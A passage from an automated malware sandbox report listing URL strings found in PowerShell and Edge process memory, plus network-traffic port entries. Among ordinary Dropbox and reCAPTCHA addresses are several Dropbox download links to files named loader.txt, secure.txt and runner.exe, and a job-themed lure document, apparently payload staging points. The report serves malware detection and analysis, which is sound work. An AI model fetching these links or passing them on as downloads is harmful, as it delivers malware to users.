                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com/cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-P
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com/cd/0/get/CggX9InEjGrp3qf5MHF2B-OZg-4e
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com/cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com/cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEc
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/eq3zzfmbzxl2qzjzw9o23/loader.txt?rlkey=bmuqypu1j3oi6li0xv4rbm694&dl=1
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/uX
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A50CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1
                    Source: powershell.exe, 00000016.00000002.2684869746.000001A0BC006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvmA
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/z
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A50CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-des
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
